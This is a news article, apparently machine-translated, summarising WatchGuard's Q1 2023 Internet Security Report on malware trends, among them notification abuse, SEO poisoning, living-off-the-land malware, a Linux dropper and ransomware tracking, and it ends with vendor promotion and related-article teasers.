Security report Q1/23: New malware often from Russia and China 

Security report Q1/23: New malware often from Russia and China - Image by Egonetix_xyz on Pixabay

Share post

Cyber ​​attackers are constantly coming up with new attack methods. The security report for the first quarter of 1 not only shows new traps, but also proves that three of the four newcomers on the top 2023 malware list come from Russia and China.

According to WatchGuard's Internet Security Report, attackers are now discovering new ways to trick users surfing the Internet. After web browsers have recently upgraded their protection mechanisms against pop-up abuse, cybercriminals are now focusing on the still relatively new browser notification options.

Malware trends for Q1/2023

As the analysis of malware trends and attempted attacks on networks and end devices for the first quarter of 2023 shows, the authorization functions for corresponding notifications are being manipulated with increasing frequency. The main aim is to trick users into installing malicious software or agreeing to use anti-malware services with excessive fees. In addition, the so-called SEO poisoning, which is actually old hat for a long time, is making a comeback. With this type of attack, cybercriminals strive to create SEO-optimized websites that appear as high up as possible in search engine queries for currently trending search terms in the result list and entice the searcher to click. It is not uncommon for malware to be waiting at the destination, which unfolds its effect via drive-by download.

Businesses need constant attention

"In any case, companies are well advised to consistently and actively pay attention to the existing solutions and strategies for protecting their own organization," concludes Corey Nachreiner, Chief Security Officer at WatchGuard. “Consistent with the threat posed by living-of-the-land attacks and other sophisticated threats, the importance of layered malware defenses is extremely high. Platforms that uniformly bring together comprehensive IT security functionality and are managed by professional managed security service providers provide a reliable foundation for this.”

Key findings from the WatchGuard Internet Security Report Q1/2023

Actors from China and Russia are behind 75 percent of the threats newly located in the top malware ranking

Three of the four newcomers to WatchGuard's top ten malware list have close national ties, but that doesn't necessarily mean the cybercriminals behind them are actually government-sponsored. A specific example is the Zuzy malware family, which made its debut in the top 10 malware list. One form of this, for example, targets the Chinese population with adware and the intention to install a compromised browser that will take over the system's Windows settings as the new default browser.

Ongoing attacks on Office products and the discontinued Microsoft ISA Firewall

The most widespread attack scenarios are still document-based attacks on Office products. On the network side, the WatchGuard Threat Lab also locates numerous hits in the course of exploits against the outdated Microsoft firewall "Internet Security and Acceleration (ISA) Server" - surprising in view of the fact that Microsoft has long since discontinued it and is no longer supporting or updating it all the more so that hackers are still targeting them.

Living-of-the-land attacks are on the rise

The "ViperSoftX" variant discovered during DNS analysis is the latest example of malware that uses the tools built into the operating systems to achieve its goals. The repeated emergence of Microsoft Office and PowerShell-based malware underscores the importance of endpoint protection that is functionally able to distinguish between legitimate and malicious use of popular tools like PowerShell.

New malware dropper targeting Linux-based systems

The emergence of a new Linux-targeted malware dropper proves once again that attackers are by no means just targeting Windows as the mainstay of the enterprise operating system. Linux and macOS users should never be too sure. It is therefore essential to ensure that all end devices are covered without exception when introducing and using Endpoint Detection and Response (EDR) functionality, regardless of their operating system.

Zero-day malware accounts for the lion's share of the threats identified

In unencrypted web traffic, zero-day malware accounts for 70 percent of the total volume of security-relevant discoveries, and in encrypted data traffic it is even 93 percent. The enormous risk that IoT devices, incorrectly configured servers or other devices will become a gateway for attackers is therefore more than obvious. Host-based security functionality (such as that offered by WatchGuard EPDR) provides a reliable remedy here.

New ransomware tracking

Chief Security Officer (CSO), WatchGuard Technologies (Image: WatchGuard).

The new tracking, which was carried out for the first time during the analysis of the Internet Security Report Q1 2023, also provided important additional insights: For example, the Threat Lab identified 51 new ransomware variants and came up with one through corresponding announcements on relevant extortion websites Total number of 852 companies newly joining the group of organizations affected by a ransomware attack. Sadly, the frequency of such announcements is steadily increasing, and among the victims are not least a number of well-known companies and Fortune 500 corporations.

Framework data for analysis

WatchGuard's quarterly research reports are based - in accordance with the concept of the "Unified Security Platform" - on the anonymized, aggregated data of all active WatchGuard solutions for network and endpoint protection, whose owners have agreed to share the threat intelligence in support of the research work of the Threat Lab have. What is new this time compared to the previous editions of the Internet Security Report is the type of evaluation, analysis and presentation of results.

From now on, results in the area of ​​network security are no longer presented in terms of total volumes, but as average values ​​per device according to the population of appliances considered. The reasons are discussed in more detail in the full report. This also contains numerous details on other malware and network trends from the first quarter of 2023, corresponding recommendations for security strategies, important defense tips for companies of all sizes and industries and much more.

More at


About WatchGuard

WatchGuard Technologies is one of the leading providers in the field of IT security. The extensive product portfolio ranges from highly developed UTM (Unified Threat Management) and next-generation firewall platforms to multifactor authentication and technologies for comprehensive WLAN protection and endpoint protection, as well as other specific products and intelligent services relating to IT security . More than 250.000 customers worldwide rely on the sophisticated protection mechanisms at enterprise level,


Matching articles on the topic

Report: 40 percent more phishing worldwide

The current spam and phishing report from Kaspersky for 2023 speaks for itself: users in Germany are after ➡ Read more

IT security: NIS-2 makes it a top priority

Only in a quarter of German companies do management take responsibility for IT security. Especially in smaller companies ➡ Read more

Printers as a security risk

Corporate printer fleets are increasingly becoming a blind spot and pose enormous problems for their efficiency and security. ➡ Read more

Stealth malware targets European companies

Hackers are attacking many companies across Europe with stealth malware. ESET researchers have reported a dramatic increase in so-called AceCryptor attacks via ➡ Read more

Cyber ​​attacks increase by 104 percent in 2023

A cybersecurity company has taken a look at last year's threat landscape. The results provide crucial insights into ➡ Read more

Mobile spyware poses a threat to businesses

More and more people are using mobile devices both in everyday life and in companies. This also reduces the risk of “mobile ➡ Read more

Test: Security software for endpoints and individual PCs

The latest test results from the AV-TEST laboratory show very good performance of 16 established protection solutions for Windows ➡ Read more

Crowdsourced security pinpoints many vulnerabilities

Crowdsourced security has increased significantly in the last year. In the public sector, 151 percent more vulnerabilities were reported than in the previous year. ➡ Read more